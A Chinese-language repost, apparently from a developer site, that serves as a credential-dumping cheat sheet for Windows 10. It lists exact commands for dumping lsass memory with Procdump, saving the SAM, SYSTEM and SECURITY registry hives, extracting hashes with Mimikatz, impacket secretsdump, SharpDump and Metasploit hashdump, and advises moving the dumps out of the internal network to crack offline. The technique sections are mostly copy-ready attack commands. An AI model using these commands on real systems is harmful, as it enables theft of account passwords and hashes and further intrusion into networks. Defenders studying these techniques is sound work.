内容简介:测试机器: Windows 10 1809Procdump(管理员权限下运行)
推荐使用 Procdump,reg 和 sharpdump 导出本地,再想办法从内网中运出来本地破解
测试机器: Windows 10 1809
0x01 Procdump + Mimikatz
Procdump
(管理员权限下运行)
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
然后本地解出hash即可
sekurlsa::minidump C:\lsass.dmp sekurlsa::logonpasswords full
0x02 Reg + impacket/Mimikatz (强推)
使用 Reg 需要NT/SYSTEM权限
reg save HKLM\SYSTEM system.hiv reg save HKLM\SAM sam.hiv reg save HKLM\security security.hiv
Mimikatz 调用 lsadump
lsadump::sam /system:system.hiv /sam:sam.hiv
impacket/secretsdump.py
python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL
0x03 Sharpdump (强推)
Out-Minidump.ps1 的 C#版本 编译结果
需要.NET 3.5版本框架
0x04 Wce、Quarks PwDump、GetPass……
没怎么用过,都是以前比较老的,Getpass是Mimikatz的编译版本,没啥意思
0x05 Msf modules
hashdump
条件:
- Meterpreter Session
- NT/SYSTEM
hashdump只能dump本地用户
smart_hashdump
条件
- Meterpreter Session
- NT/SYSTEM
可以dump本地 + 域用户hash
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 如何使用代理IP进行数据抓取,PHP爬虫抓取亚马逊商品数据
- 抓取 Grafana Panel 视图
- Python爬虫:抓取新浪新闻数据
- Python抓取花瓣网高清美图
- Python爬虫:抓取新浪新闻数据
- 灵巧工业机器人(一)抓取
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Qt 5.9 C++开发指南
王维波、栗宝鹃、侯春望 / 人民邮电出版社 / 2018-5-1 / 89.00元
本书以Qt 5.9 LTS版本为开发平台,详细介绍了Qt C++开发应用程序的技术,包括Qt应用程序的基本架构、信号与槽工作机制、图形显示的Graphics/View架构、数据编辑和显示的Model/View架构、对话框和多窗口的设计与调用方法等,介绍了常用界面组件、文件读写、绘图、图表、数据可视化、数据库、多线程、网络和多媒体等模块的使用。每个编程主题都精心设计了完整的实例程序。 通过阅读......一起来看看 《Qt 5.9 C++开发指南》 这本书的介绍吧!
